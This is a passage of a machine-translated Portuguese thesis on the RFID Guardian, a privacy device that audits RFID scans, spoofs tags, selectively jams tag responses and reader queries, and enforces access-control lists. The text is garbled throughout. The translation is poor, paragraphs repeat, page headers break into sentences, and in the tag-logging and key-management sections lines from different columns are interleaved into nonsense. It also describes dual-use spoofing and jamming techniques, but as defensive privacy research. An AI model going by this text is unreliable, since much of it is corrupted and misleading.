Mdulos de sistema Portas RFID so as API genrica apresentada por camadas superiores os drivers de dispositivo. Portas so endpoints bidirecional para comunicao. Eles diferem de soquetes em que a comunicao RFID, alm de bits de dados, consiste em start-de-armao e fim-de-frame marcadores, que tambm pode ocorrer de forma isolada. RFID pilhas de protocolo contm uma implementao de vrias pilhas de protocolo RFID, incluindo ISO15693, ISO-14443, e ISO-18000. Estas pilhas de transformar os fluxos de bit a partir do dispositivo RFID em quadros, e vice-versa.

Cadeias porta filtro fornecer um meio para notificar de nvel superior mdulos de chegada de um quadro de RFID. Cada porta RFID tem uma cadeia de filtro. Um mdulo pode registrar uma funo de filtro com uma cadeia de filtros porto. Um filtro pode preencher um quadro de resposta (ou uma interferncia frame), e indicar para a cadeia de filtro que a resposta deve ser enviada. Callbacks consulta so callbacks que so registrados com drivers de dispositivo RFID, que so invocados cada vez que um byte foi lido a partir do canal de RFID. Estes chamamcostas pode retornar um cdigo de status para indicar que a recepo deve abortar imediatamente. O tempo gasto por este tipo de retorno de chamada deve ser muito curta: deve caber na latncia entre dois chegaram RFID smbolos, que pode ser to curto como 2 bits. A lgica destinado a interferncia em uma troca por RFID interromper o pedido pelo leitor, e no a resposta do tag.

76

RFID G UARDIAN : P LATFORM OANORMICA

CHAP. 5

Drivers de dispositivos Drivers de dispositivo se comunicar com o hardware RFID atravs de pinos GPIO. Atual drivers de dispositivos so: device tag 13,56 (receptor / transmissor), e 13,56 dispositivo leitor. O transmissor tag tambm capaz de gerar resposta corrompido quadros para jamming.

RTOS [34] um amplamente implantado open-source do sistema operacional de tempo real (RTOS). ECOS contm suporte para interrupes, threads, temporizadores, discos flash, e drivers para todos os tipos de dispositivos como linha serial, USB, relgios de tempo real, e GPIO (General Objetivo I / O) pinos. Callbacks filtro Callbacks filtro de fornecer um meio para notificar de nvel superior mdulos de chegada de um RFID frame. Cada porta RFID tem uma cadeia de filtro. Um mdulo pode registrar um filtro funo com uma cadeia de filtros porto. Um filtro pode preencher um quadro de resposta (ou uma quadro jamming), e indicar para a cadeia de filtros que a resposta deve ser enviada para fora. No Guardian RFID, uma porta normalmente tem um segmento que est bloqueado, esperando por um quadro de chegar. Se o segmento acordado para um novo quadro, que em seguida, chama o Callbacks Intercept Consulta filtros em cadeia de filtros do porto, e envia uma resposta, se necessrio. so callbacks que so registrados com drivers de dispositivo RFID, que so invocados cada vez que um byte foi lido a partir do canal de RFID. Estes callbacks pode retornar um cdigo de status para indicar que a recepo deve abortar imediatamente. O tempo gasto pelo este tipo de retorno de chamada deve ser muito curta: ele deve caber na latncia entre dois chegou smbolos RFID, que pode ser to curto quanto 2 bits. A lgica destinado interferncia em uma troca de RFID por perturbar a pedido pelo leitor, no o resposta do tag.

5.4. Interfaces de Usurio


Usurios podem se comunicar com o Guardio RFID por uma variedade de meios: pela linha serial ou socket, sobre o canal de RFID, ou usando um celular Nokia ou TFT (Via Bluetooth).

SCE . 5,4

USER EuNTERFACES

77

UI celular Ns testamos dois celulares como plataformas para a Interface do Usurio para o Guardian RFID: o Nokia E60 (mostrado na Figura 5.6, Painel 1) um padro telefone com um teclado numrico, cinco teclas de navegao, e duas teclas de funo. Tambm, o Nokia E61 um smartphone com um teclado numrico e um teclado QWERTY.

Figura 5.6: RFID Interface do Usurio da Guarda

Ambos os telefones executar o sistema operacional Symbian, juntamente com a plataforma S60 da Nokia, para que um emulador est disponvel. Estamos usando Eclipse e Carbide.j como o SW ambiente de desenvolvimento, para a escrita RFID Guardio UI "midlets", que pode facilmente porta para outras J2ME + JSR-82 aparelhos habilitados. At agora temos apenas testado midlet portabilidade de telefones Nokia, mas em algum ponto, ns tambm gostaramos de testar isso em outras plataformas (ou seja Sony). Os celulares Nokia tambm possuem built-in Bluetooth apoio, que usamos para falar com o mdulo Bluetooth Linkmatic, e um SitecomCN-812-v1 Bluetooth dongle USB, que foi conectado a um PC executando um emulador RFID Guardian. Tambm importante mencionar que optamos por usar um celular como um interface com o usurio, porque prevemos que um dia a eletrnica analgica do Guardio RFID poderiam ser miniaturizados em um nico chip de silcio e embebidos em um dispositivo mvel como um celular ou PDA, e muito, da mesma forma que Near Field Communications (NFC) foi integrado celulares Nokia. A Interface de Usurio Celular pode iniciar o seguinte funes de alto nvel sobre o Guardio RFID (mostrado na Figura 5.6, Painis 2 e 3): Funes tag: Realizar um exame de RFID, a propriedade tag transferncia, gerenciar tag sets, gerenciar chaves de tag, e gerenciar spoofing tag. As funes do leitor: Gerenciar RFID reader / papel listas, gerenciar Guardio-Reader chaves / certificados, adicionar e remover os leitores / papis. (Para a diferena entre

78

RFID G UARDIAN : P LATFORM OANORMICA

CHAP. 5

leitores e funes, consulte a seo 7.3.2) Funes de controle de acesso: Selecione o diretrio ACL, verifique o status do LCA, load / save / limpar a ACL, e definir o contexto de ACL. Funes de auditoria: Definir alertas em tempo real, visualizar ou configurar scan / tag logging, e ver / configurar general-purpose logs. Funes avanadas: Segurana (difuso de revezamento, / replay, DPA) e Adminnistrao (load novos programas, reflash EEPROM, backup / sincronizao via um leitor de + PC, navegador do sistema de arquivos de celular, Guardian navegador de arquivos, mudana de horrio do sistema.)

CCAPTULO 6

RFID Guardian: Primitive Operaes


6.1. RFID TAG spoofing
Leitores RFID produzir um campo eletromagntico que liga as etiquetas RFID, e fornece-lhes um sinal de referncia (por exemplo, 13,56 MHz) que podem usar para fins de temporizao internos. Uma vez que uma tag RFID consultar um decodifica a partir de um RFID leitor (usando seus circuitos internos), que codifica a sua resposta por ligar e desligar um resistor em sincronizao com o sinal do leitor do relgio. Esta chamada de carga " modulao "do sinal de portadora resulta em duas bandas laterais, que so picos de pequena radio energia, um pouco maior e um pouco inferior frequncia portadora. Etiqueta informaes de resposta transmitida unicamente nessas bandas laterais 1, Ao invs de na sinal de portadora. Figura 6.1 (a partir do Manual de RFID [41]) ilustra o que essas bandas laterais parecer, em relao freqncia de portadora leitor-gerada. A comparabandas laterais relativamente pequenas tm o poder de aproximadamente 90 decibis menor do que o leitorgerado sinal de portadora, e esta a razo pela qual as respostas tag RFID tm, frequentemente, como um alcance de transmisso limitado. O segredo para a criao de respostas tag falso gerar o lateral duas freqncias, e us-los para enviar de volta as respostas corretamente codificados que so sinnized com o sinal do leitor de RFID do relgio. A maneira mais simples para gerar esses bandas laterais imitar uma tag RFID, por ligar e desligar um resistor de carga com o timing correto. A desvantagem dessa abordagem que a modulao passiva de 1Bandas laterais no nossa resposta tag falso com limitaes de alcance idntico o sinal leitor sela a so apenas um fenmeno RFID especfica - eles tambm so comumente usados para
transmitir informao em rdio e televiso, as comunicaes de longa distncia, voz e amadores rdio.

80

RFID G UARDIAN : P RIMITIVE OPERAES

CHAP. 6

Figura 6.1: Normais RFID Tag sinal

SCE . 6,2

RFID TAG SPoofing

81

to real etiquetas RFID ( 10 cm para a nossa configurao de teste).

Figura 6.2: Falsificado RFID Tag sinal

Uma alternativa superior usar a energia da bateria para gerar o lateral duas freqncias. Estas bandas laterais super-poderosos so detectveis a distncias muito maiores, aumentando assim o alcance da transmisso da nossa resposta tag falso. O RFID prottipo Guardio utiliza o "ativo" abordagem spoofing tag. Figure 6.2 mostra o sinal gerado pelo nosso transmissor tag. O spoofed "bandas laterais" so transmitidos em um nvel de potncia, aproximadamente igual ao sinal do leitor portador. Este aumentou a gama de nossas respostas tag falso - de 10 cm a um metro e meio de distncia. Tambm vale mencionar que podemos spoof vrias marcas ao mesmo tempo (ver Figura 6.3. Conseguimos falsificado at 200 etiquetas RFID de uma vez.

82

RFID G UARDIAN : P RIMITIVE OPERAES

CHAP. 6

Figura 6.3: Etiquetas RFID Spoofing Mltiplas

6.2. RFID JAMMING SELETIVA 6.2.1. RFID Tag Jamming Response


Esquema The Guardian RFID jamming seletiva foi projetado para ISO-15693 tags, que usam o sistema anticoliso Slotted Aloha. Seletiva RFID Jamming usa a emulao tag para decodificar a entrada RFID consulta leitor, determina se o consulta permitida (de acordo com o ACL), em seguida, envia um sinal de interferncia curto que precisamente bloqueia o timeslot no qual o "protegido" tag RFID vai dar o seu de resposta. H 16 timeslots aps uma consulta de estoque, portanto, durante a primeira rodada de anticoliso, o bloqueio tem 1 chance em 16 de interferir acidentalmente qualquer apresentar outra tag RFID. Durante cada rodada subseqente de anticoliso, o leitor questes outra consulta de estoque com um valor de mscara ligeiramente modificada, que tem como alvo um faixa um pouco mais estreito de tags RFID do que antes. Dado rounds bastante anticoliso, o valor da mscara vai excluir a tag RFID (s) que esto sendo "protegidos", permitindo que outras tags nos arredores de obter suas respostas ouvido pelo leitor RFID. Isto significa que, na prtica, o nosso sistema tem uma chance desprezvel de bloquear a respostas incorretas tag RFID. Isso faz com que forma o Guardian RFID de selecvamente jamming consultas de estoque muito menos intrusivos do que o conceito de Tag Blocker de "zonas de privacidade" [77], que bloqueiam faixas inteiras de identificadores tag (independentemente de quem detm a marca.) Alm disso, tambm importante mencionar que a RFID Guardio pode facilmente spoof e gelia, ao mesmo tempo.

SCE . 6,2

RFID S ELETIVA JAMMING

83

Figura 6.4: Seletivamente Tag Jamming # 2

Estudo de Caso: Jamming RFID Seletiva Esta seco ir fornecer um passo-a-passo demonstrao de como Jamming RFID seletiva funciona. Para fins de demonstrao, temos dado o Guardian RFID uma marca mnima lista de propriedade que contm apenas uma tag (UID: 0xe0040100003b0cbd). Um nico entrada em uma ACL igualmente mnima prescreve bloqueando todas as tags na lista de propriedade: Etiqueta Leitor ... ... Propriedade < lista> * Comando ... * Contexto ... *

Vamos agora gerar consultas de estoque com o nosso Philips MIFARE / Pagode I.Code RFID Reader, que conduzido a partir de uma interface de PC Windows. Inicialmente, o RFID Guardian desligado, eo leitor Philips detecta trs tags em sua vizinhana: a marca que est na nossa lista, propriedade e duas marcas desconhecidas (UID: 0xe0040100003b2252 e 0xe0040100003afab9). (Veja a Figura 6.5 para uma screenshot). Quando o Guardio RFID habilitado, o Reader da Philips consultas de estoque so imediatamente detectadas. Estes pedidos so decodificados, eo RFID Guardian lgica interna determina que a consulta deve ser bloqueado. The Guardian, em seguida, envia um sinal de interferncia curto (ca. 350sec) no timeslot 13 do inventrio secia, uma vez que o slot corresponde tag protegido: 0xe0040100003b0cbd. Apenas as duas tags desprotegidos so reconhecidos pelo leitor Philips agora, e

84

RFID G UARDIAN : P RIMITIVE OPERAES

CHAP. 6

Figura 6.5: Screenshot Durante Consulta ininterrupto

SCE . 6,2

RFID S ELETIVA JAMMING

85

o bloqueio causou um erro de CRC que relatado na parte inferior do painel central do interface de usurio do leitor (ver Figura 6.6).

Figura 6.6: Screenshot Durante Jamming RFID Seletiva

Sada de depurao do Guardio RFID ilustra as etapas de processamento, incluindoing a deciso de atolamento no timeslot 13:

Pedir uma t eof 76,877230 INVENTRIO RFID ( Bandeiras 1a = FLAG-RFID Taxa de Quadros DATA 1b RFID BANDEIRA INVENTRIO FRAME), 1c masklen = 0x00 mscara, = 0x0; 2 Inventory: t eof 76,877230 s-> SN 0 s-> NBS 16 3 Inventory: t eof 76,882010 s-> SN 1 s-> NBS 16 4 Inventrio: t eof 76,886791 s-> SN 2 s-> NBS 16 5 Inventory: t eof 76,888304 s-> SN 3 s-> NBS 16 6 Inventrio: t eof 76,891568 s-> SN 4 s-> NBS 16 7 Inventory: t eof 76,896340 s-> SN 5 s-> NBS 16 8 Inventory: t eof 76,901120 s-> SN 6 s-> NBS 16 9 Inventory: t eof 76,905893 s-> SN 7 s-> NBS 16 10 Inventrio: t eof 76,910673 s-> SN 8 s-> NBS 16

86

RFID G UARDIAN : P RIMITIVE OPERAES

CHAP. 6

11 Inventrio: t eof 76,915446 s-> SN 9 s-> NBS 16 12 Inventrio: t eof 76,920225 s-> s-SN 10> NBS 16 13 Inventrio: t eof 76,924999 s-> s-SN 11> NBS 16 14 Inventrio: t eof 76,929778 s-> s-SN 12> NBS 16 15 Inventrio: t eof 76,934552 s-> s-SN 13> NBS 16 16 JAM Inventrio t 76,934869 em s-> s-SN 13> NBS 16 16-A mscara len 0 mscara 0x0 17 Inventrio: t eof 76,939330 s-> s-SN 14> NBS 16 18 Inventrio: t eof 76,944107 s-> s-SN 15> NBS 16

Linhas 1-1c relatrio um pedido de inventrio com um comprimento da mscara 0, e bandeiras indiing uma seqncia de inventrio 16 slots. Linhas 2 a 18 End relatrio da Frame (EOF) pulsos que marca o incio de um novo timeslot. (S-> SN indica o slot atual nmero.) Linha 16-16a corresponde com timeslot 13, e indica o geo de um sinal de interferncia. Restries de tempo The Guardian RFID refora controle de acesso decises em nome de tags RFID, para desempenho em tempo real necessria em ambas as condies normais e hostil. Afinal de contas, bloqueando a resposta de uma tag depois ele atingiu o atacante no muito til.
ISO 15693 tempo restries SOF 75,52 Dados 1510,4-3.927,04 EOF 37,76 Tempo de espera 320,9 SOF resposta
s

RFID Guardio restries de tempo

Quadro de entrada (SOF + dados + EOF) 1623,68-4.040,32

Max. Processamento Despesas gerais Tempo SOF Response sobrecarga 23 292,9 5


s

Figura 6.7: Restries de tempo

Na parte superior linha do tempo da Figura 6.7, mostramos as restries de tempo para uma seqncia de inventrio de solicitao-resposta, conforme especificado pelo padro ISO. Como every mensagem de RFID, o pedido emoldurada por um marcador de incio de quadro (SOF) e marcador de um fim-de-frame (EOF). Entre estes marcadores, um pedido de inventrio carrega entre 40 (o tamanho da mscara 0) e 104 bits (o tamanho da mscara de 64) de dados. Depois receber o EOF pedido, a tag deve aguardar 320,9 ms antes de iniciar a sua responder. Este o momento do Guardian RFID tem que interpretar os pedidos leitor e responder a elas.

SCE . 6,2

RFID S ELETIVA JAMMING

87

Quanto menor a linha de tempo da Figura 6.7 mostra o desempenho medido do RFID Guardian. Depois de um quadro completo recebido (SOF, dados e EOF), ele necessidades 23 ms para acordar o thread que monitora o receptor e analisa o requadro de busca. Imediatamente antes da expedio do quadro de resposta, mais 5 ms sobrecarga de disparo gasto em cima do transmissor. Entre estes dois eventos, o RFID Guardian 320,9 - (23 + 5) = 292,9 ms para consultar a ACL (e apoioing estruturas de dados) e decidir se deve ou no bloquear a resposta tag RFID. Quanto tempo leva esta deciso depende de como o Guardian ACL RFID organizado. Para encontrar um superior grosso ligado no comprimento ACL que podem ser tratadas pelo prottipo Guardian, ns escolhemos a implementao mais lenta possvel para o ACL: um array ainda desordenado de UIDs que s podem ser percorridos sequencialmente para localizar um UID especfico. Uma solicitao de RFID dirigida ao ltimo item da ACL foi enviado para o Guardian, forando-o a percorrer a lista inteira. Com 2.600 entradas, o Guardio foi capaz de responder a tempo. O prottipo da Guarda est equipado com um processador XScale poderoso em alta velocidade de clock, 520 MHz. Para saber se um Guardio com menos poder de processador seria ainda ser vivel, variamos a velocidade do clock do XScale. Os resultados so mostrados na Figura 6.8. O comprimento ACL que o Guardian ainda podia lidar com a diminui com o velocidade de relgio, mas muito menos do que proporcionalmente. Isto atribudo a duas causas: a velocidade da memria desce mais devagar e em passos mais grossa do que a velocidade da CPU, e partes do dispositivo de processamento so independentes da velocidade da CPU. Em 208 MHz, o Prottipo da guarda pode processar ACLs de comprimento de 1800, mesmo com essa suboptimal Implementao de ACL. Claro que, com uma tabela hash em vez de uma lista linear, um grande nmero de ACLs podem 6.2.2. RFID Jamming Consulta Leitor Em suma, o comprimento ACL no provvel ser pesquisados na 292,9 disponvel ms. que seja um Para se proteger contra maliciosos comandos problema, mesmo em um XScale muito lento. leitor RFID (como escrever e matar consultas), The Guardian RFID tambm seletivamente congestionamentos consultas leitor RFID. The Guardian consegue-o, interpretando a primeira metade de uma consulta de entrada, decidindo se o consulta permitida, e logo em seguida iniciar o transmissor tag, e corruptoing o resto da consulta (incluindo o CRC e EOF) se a consulta no permitida. Neste caso, porque (no mnimo desencapado), o CRC e EOF so ilegveis, as tags RFID ignorar as indesejveis consultas leitor RFID. Aqui est uma descrio mais detalhada de como esse processo funciona: O RFID Guardio primeiro analisa o ACL, verificao de contexto e papel, e depois ele corresponde regras aplicveis contra a entrada de pedidos RFID. Por exemplo, se um ACL contm uma regra que "Write Bloco Mltiplo" pedidos deve ser interferido, ento o primeiro dois bytes de cada solicitao de entrada (bandeiras e comando tipo) deve ser verificada

88

RFID G UARDIAN : P RIMITIVE OPERAES

CHAP. 6

3000

2500 Tamanho mximo do ACL

2000

1500 150

300450 Velocidade da CPU (MHz)

600

Figura 6.8: Tamanho mximo de ACL que podem ser processados em uma CPU Dado Velocidade

SCE . 6,3

GUARDIAN PROTOCOLO

89

durante a recepo. Se a consulta ento considerada invlida, o transmissor tag entra em ao: enviar o mesmo tipo de quadro de interferncia (rudo aleatrio), que usado em RFID jamming resposta tag, portanto, qualquer presente tags no ser capaz de executar a ao escrever. Figura 6.9, ilustra este procedimento. A linha inferior mostra a atividade do leitor (A barra de massa um colapso de ondas de 13,56 MHz), o smbolo SOF e os primeiros 8 2bit smbolos so indicados, como o momento em que as partidas de retorno de chamada. Leva-ap proximately 20s aps o comando proibido reconhecido, at que o Guardio transmissor, cujo sinal dado na linha superior, torna-se ativa.

Figura 6.9: Tempo de RFID Jamming Consulta

6.3. GUARDIAN PROTOCOLO


Lotes de alto nvel funcionalidade do aplicativo foi introduzido neste captulo, mas pouco tem sido dito sobre as interaes do Guardian RFID com um Guardian " aware "infra-estrutura RFID (introduzido na Seo 2). RFID Guardio-Reader comunicaes usar uma meta-linguagem que chamamos de Guardio Protocol (GP), que encapsulado na norma ISO-compliant 'ler / escrever vrios blocos "comandos. Tambm vale mencionar que o Guardio Protocolo API que o usurio interfaces (Nokia Cellphone, TFT, cabo serial, comandos via RFID) usar para controlar a funcionalidade do Guardio RFID. Aqui est uma lista dos comandos actual Protocolo Guardian:

[Contexto acl]: adicionar, remover, jogo, show, entrada da lista, [Acl leitor]: adicionar, remover, jogo, show, papel lista, a entrada, a lista

90

RFID G UARDIAN : P RIMITIVE OPERAES

CHAP. 6

[Papel acl]: entrada, adicione leitor, remover leitor, criar, apagar, lista leitor de lista, [Acl tag]: adicionar, del, nome, entrada lista, lista [Acl tag set]: conjunto criar, apagar set, set adicionar, remover set, set tag lista, set list, entrada do conjunto [Acl acl]: dir, salvar, commit, reload, claro, status [Acl estado]: carregar, salvar, dir get, set dir [Pardia]: spoof comear, alias spoof, a lista de spoof, status spoof, info, permitir, inventrio leitor obter, redefinir [Log de auditoria]: permitir, arquivo, status, flush, vista [Arquivo]: salvar, caminho dir, dir, o tamanho do arquivo, gato, desvincular, chdir, mkdir, rmdir, pwd, renomear [Data sys]: get, set [Sys]: sys reiniciar [Alerta acl]: no confirmadas, no salvo Uma ressalva que, como o Guardian RFID est emulando uma tag RFID, Guarda-Reader comunicaes so limitados pelo mestre-escravo interaes. Em outras palavras, os leitores da Guarda-aware RFID deve sempre iniciar comunicaes es com o Guardio RFID. Designers deve manter isso em mente ao criar padres de interao para a nova segurana RFID e funcionalidades de privacidade.

CCAPTULO 7

Ferramentas para RFID de Privacidade


The Guardian RFID, introduzido pela primeira vez em [134], um porttil com bateria devcio que medeia as interaes entre os leitores RFID e tags RFID. O RFID Guardio aproveita uma on-board leitor RFID combinado com emulao tag romance capacidades de auditoria e atividade de controle RFID, assim, impor a conformidade com a poltica de segurana do usurio. A grande maioria dos leitores de RFID no explicitamente interagir com o RFID Guardian. Escutas e inteligente ttica de emulao de tag so necessrios para recolher informaes a partir desses leitores. No entanto, no futuro, um grupo de off-the-shelf Leitores RFID ter especial de back-end SW instalado, que lhes proporciona uma "conscincia" do Guardian.1Estes leitores RFID tendem a estar em familiarizado loctions (ou seja, em casa, no escritrio), e eles so intencionalmente concedeu mais generous permisses de acesso. Estes leitores de RFID podem explicitamente cooperar com o Guardian, o envio de dados contendo as mensagens de autenticao, as atualizaes de contexto, ou chaves secretas. O restante deste captulo descreve o projeto do Guardio RFID, enfocando em quatro questes fundamentais: (i) auditoria, (ii) o gerenciamento de chaves, (iii) controle de acesso, e autenticao (iv).

7.1. AUDITORIA
Auditoria o ato de registo e de anlise de eventos que acontecem no mundo. Assim como rgos reguladores poderiam auditoria ou finanas corporativas de telefonia mvel nosidade, o RFID auditorias Guardio todas as atividades RFID dentro da faixa de rdio. RFID auditing serve mltiplas funes: Atua como um impedimento contra o abuso, ele fornece uma 1Mesmo esses "Guardian consciente" ilcitas, e usam hardware fonte de e interfaces areas. meios para detectar atividadesleitores ainda fornece umaRFID padro"evidncia" para apoiar

92

TOOLS PARA RFID P RIVACY

CHAP. 7

mais tarde as medidas correcionais. The Guardian RFID suporta duas formas de auditoria, RFID scan registro e RFID tag explorao madeireira, ambos os quais so novos no contexto do RFID.

7.1.1. Varredura Logging


Nancy loja de departamento favorita descobriu recentemente que a digitalizao RFID uma excelente forma de fazer publicidade direcionada ("Voc recentemente comprou uma blusa Prada - Talvez voc estaria interessado em comprar a nossa bolsa matching "). InfelizInfelizmente, ao contrrio as leis de privacidade local, o gerente da loja convenientemente esqueceu de colocar um sinal de notificar os clientes sobre os scans RFID. RFID digitalizao Logging permite que os consumidores de auditoria RFID varreduras nas imediaes. The Guardian RFID usa seu "tag emulao de" capacidades de ouvir e decodificar o RFID varreduras em seu ambiente. Para cada consulta, ele registra informaes tais como: cdigos de comando, as bandeiras, os parmetros (eg tag RFID consultado), dados passados, e anotaes (por exemplo, timestamp). The Guardian RFID armazena essas informaes e exibe a pedido (usando um LCD ou tela) ou registra as informaes scan para posterior recuperao. Emulao tag registra o UID de 64 bits (tag ID), um comando de 8 bits cdigo, e anotaes (como um timestamp 32-bit). Dados de consulta registrado por padro, a menos que a memria flash est quase cheio. Scans auditadas RFID deve ser filtrado para evitar sobrecarregar o usurio com desinteressante informaes. Por exemplo, o Guardio RFID pode ser configurado registrar apenas scans tags de segmentao "propriedade" de que o indivduo (ver prxima seo). Reconsultas repetidas vezes entrevistados (como consultas de estoques, que pedem tags em escala para identificar em si) Tag Logging 7.1.2. tambm ir gerar muito barulho, por isso melhor ter o agregado SW essas consultas (consulta de estoque por exemplo, 1000x de tempos t1-t2). RFID nem sempre desejada pelo pblico em geral, mas sua implantao tolerado em grande parte porque o pblico ignorante do assunto. O consumo pode sempre optar por remover ou desactivar as etiquetas RFID, mas o problema que o conhecimento da existncia de uma tag RFID uma condio necessria para a remoo da etiqueta. A assediador pode cair uma etiqueta RFID na bolsa de Nancy, ou uma loja de departamentos pode se esquea de avisar-lhe sobre o tag RFID anexada ao seu suter novo. O resultado que, independentemente de como ele chegou l, Nancy agora RFID-rastrevel. E sem sabendo que a tag RFID est l, ela roubado de sua liberdade para desativ-lo. O RFID Guardio faixas propriedade tag RFID e alertas de indivduos recmaparecendo (possivelmente clandestina) tags. The Guardian RFID conduz peridica Scans RFID, que detectam todas as tags dentro da faixa de rdio. Em seguida, correlaciona-se para encontrar

SCE . 7,3

KEY MGESTO

93

as etiquetas RFID que permanecem constantes ao longo do tempo, e alerta o usurio do descoery destas novas tags. Por exemplo, quando Nancy volta para casa com o seu sweater no final do dia, o Guardio RFID pode inform-la que "um novo tag RFID foi adicionado desde esta manh. " Propriedade de etiquetas RFID podem ser transferidos explicitamente atravs da interface do usurio ou um canal autenticado RFID (ou seja, ao comprar itens marcados com um RFID habilitado checkout). Propriedade de etiquetas RFID tambm podem ser transferidos implicitamente (Isto , quando entregar um livro com etiquetas RFID para um amigo.) The Guardian RFID detecta aquisio tag implcita atravs da realizao de exames peridicos RFID, e depois correlacionar de RFID relatrios tag ajustvel. Dado que nem todos os implcitos A freqncia as marcas que so desejveis, a freqncia longo do tempo. correlao / / relatrio apresenta aquisies tag permanecem constantes ao de varredura de um equilbrio entre a preciso, a privacidade, ea vida da bateria. Nossa opinio que infreqente, ocorrida correlao mais freqente em um ambiente controlado provavelmente a mais til e menos opo propenso a erros (tags RFID ou seja, comparando presente em casa no incio e final do dia).

7.2. GERENCIAMENTO DE CHAVES

Como a tecnologia RFID continua a melhorar, os consumidores encontram-se com um nmero crescente de mecanismos on-tag RFID segurana. Os consumidores podem deativar e reativar suas tags de RFID usando matar, dormir, acordar e operaes, e pode executar a criptografia, descriptografia, ou de autenticao com criptografia habilitada tags. Cada um desses mecanismos tag-on de segurana requerem o uso de uma autorizao secreta ou chaves criptogrficas. Como a maioria dos segredos compartilhados, estes valores de chave RFID tag deve ser estabelecidos, disponveis on-demand, e atualizado periodicamente para o adequado The pro- Guardian RFID bem adequado para gerenciar as chaves de tag RFID, devido sua 2 ger a segurana dos usurios. maneira habilidades de comunicao RFID. Tag chave de transferncia poderia ocorrer por escutarping no canal quando um leitor de RFID (por exemplo, um RFID tag "desactivadao da estao ") emite uma consulta contendo as informaes tecla desejada. Alm disso, "Guardian consciente" leitores RFID pode transferir informaes fundamentais explicitamente ao longo de um secura de canal, ou valores-chave podem ser inseridos manualmente atravs da interface do usurio. O RFID Guardian tambm um meio apropriado para regenerao peridica tag chaves, os dados re-criptografar tag [51], e listas de pseudnimo refrescante tag [72].

94

TOOLS PARA RFID P RIVACY

CHAP. 7

7.3. CONTROLE DE ACESSO


Nancy quer que seus itens com a tag RFID para trabalhar a seu tempo, o RFID tag com seu suter deve trabalhar com sua mquina de lavar roupa, e as marcas em seu groceries deve trabalhar com sua geladeira inteligente e microondas. No entanto, Nancy ciente da privacidade riscos inerentes RFID, e ela no quer que ela tags para ser lido por todo o mundo. Controle de acesso endereos preocupaes Nancy por controlando ativamente leitores RFID que pode consultar quais tags RFID em que circunstncias.

7.3.1. Conceitos de alto nvel


The Guardian RFID fornece controle de acesso granular, abordando uma srie de conceitos de alto nvel.

Coordenao de Segurana Primitives Desejos de Nancy refletindo a atividade / inatividade de seus cdigos sejam representados por um poltica de segurana, que executada por um ou vrios mecanismos de controle de acesso. Em outras palavras, Nancy tem uma variedade de ferramentas (por exemplo, fechaduras hash, sono / viglia modos, pseudnimos) que ela pode usar para restringir o acesso a ela etiquetas RFID. Cada acesso mecanismo de controle tem suas vantagens e deficincias que o tornam adequado (ou inadequado) para cenrios de aplicao especfica. Dado que a situao de uma pessoa conconstantemente em mudana, o usurio deve ser capaz de alavancar esses mecanismos em uma coorforma coordenada, para que possam caber restries de aplicao em um dado momento, enquanto execuo de uma poltica unificada de segurana. Nenhuma ferramenta que existe atualmente pode automatizar esse processo, e as pessoas no tm a habilidade nem a pacincia de usar estes vrios mecanismos manualmente. The Guardian RFID preenche esta lacuna, oferecendo uma intequadro ralado para a gesto automatizada de RFID segurana e privacidade mecanismos. O uso de uma poltica unificada de segurana afasta da abordagem predominante de descentralizada RFID de segurana, que apenas considera as necessidades de segurana de indietiquetas RFID ual. Especificado pelo usurio polticas, como usado no Guardian RFID, pode gerenciar a privacidade de RFID de entidades fsicas, incluindo o de usurios individuais e fixa locais (por exemplo, proteger um supermercado de RFID da mercearia concorrente, leitura ers). Outro benefcio do controle de acesso centralizado a facilidade de gerenciamento, como elimina a necessidade para a propagao e sincronizao da poltica de segurana updatas. A principal desvantagem do controle de acesso centralizado que as etiquetas RFID apenas dentro da gama de funcionamento do Guardio RFID vai receber proteo.

SCE . 7,3

ACESSO CONTROLE

95

Sensibilidade ao contexto Quando Nancy deixa o refgio de proteo de sua casa na parte da manh, o RFID tags em sua pessoa so expostos a uma quantidade maior de risco. Assim, Nancy espera que a RFID Guardian em seguida, aperte o controle de acesso desses RFID tags. The Guardian RFID especialmente projetado para adaptar as configuraes de controle de acesso para refletem a realidade da situao atual de uma pessoa. No entanto, o Guardio RFID s capaz de fazer esses ajustes depois que ele primeiro percebe a situao em si. Assim uma forma de sensibilidade ao contexto necessrio. Contexto um termo fuzzy que muito usado em computao ubqua, que refere-se essencialmente com a situao que o usurio est dentro H duas formas principais na qual o Guardio RFID pode detectar contexto de uma pessoa. Primeiro, o Guardio RFID pode-se inferir a sua informao prprio contexto. Por exemplo, o Guardio RFID pode ser capaz de detectar a sua localizao, usando GPS ou triangulao de Wi-Fi, ou poderia fazer a anotao do tempo local. Outros tipos de contexto tambm pode ser detectada, mas o mais "fuzzy" o contexto , mais difcil se torna para detect-lo, e, posteriormente, decidir como para responder a ela. Em segundo lugar, o Guardio RFID pode receber informaes de contexto de leitores RFID. Neste caso, os leitores de RFID enviar o Guardian RFID textual "Atualizaes de contexto", que consistem em uma seqncia arbitrria de dados que representa cerca de situao. Por exemplo, o leitor RFID na porta da frente da casa de Nancy poderia mand-la RFID Guardio uma mensagem, informando-o que est deixando sua propriedade. Enquanto as atualizaes contexto so mais fceis de usar que a inferncia de contexto, no h ainda so problemas. Qualquer leitor RFID no confivel pode enviar uma atualizao de contexto, por isso Tag leitor de mediao necessrio usar a autenticao para verificar a origem dessas atualizaes. Outro problema de depender de atualizaes contexto que, se o Guardian RFID no no Nancy decide que ela no quer que a loja de departamentos para ser capaz de acessar proximidades de um leitor RFID, no tem jeito de ser capaz de determinar seu contexto. o Tags RFID em suas roupas, ento ela modifica suas preferncias sobre o RFID Guardian. The Guardian RFID poderia propagar as atualizaes da poltica para o RFID marcas prprias (assumindo que as etiquetas RFID tm sua prpria segurana mechamos, o que muitos talvez no). No entanto, outra opo para o Guardian RFID para atuar como um "man-in-the-middle", mediando as interaes entre os leitores RFID e Tags RFID. Isso centraliza a tomada de deciso no Guardian RFID, e deixa as tags RFID livre para realizar suas funes especficas de aplicativo, sem queimar poder tomar decises importantes sobre segurana. RFID Funcionalidade Proxy um exemplo de mediao construtiva quando a RFID Guardio encaminha consultas criptograficamente protegidos com etiquetas RFID no nome dos leitores RFID no confivel. Mediando tag RFID acesso, RFID Proxy

96

TOOLS PARA RFID P RIVACY

CHAP. 7

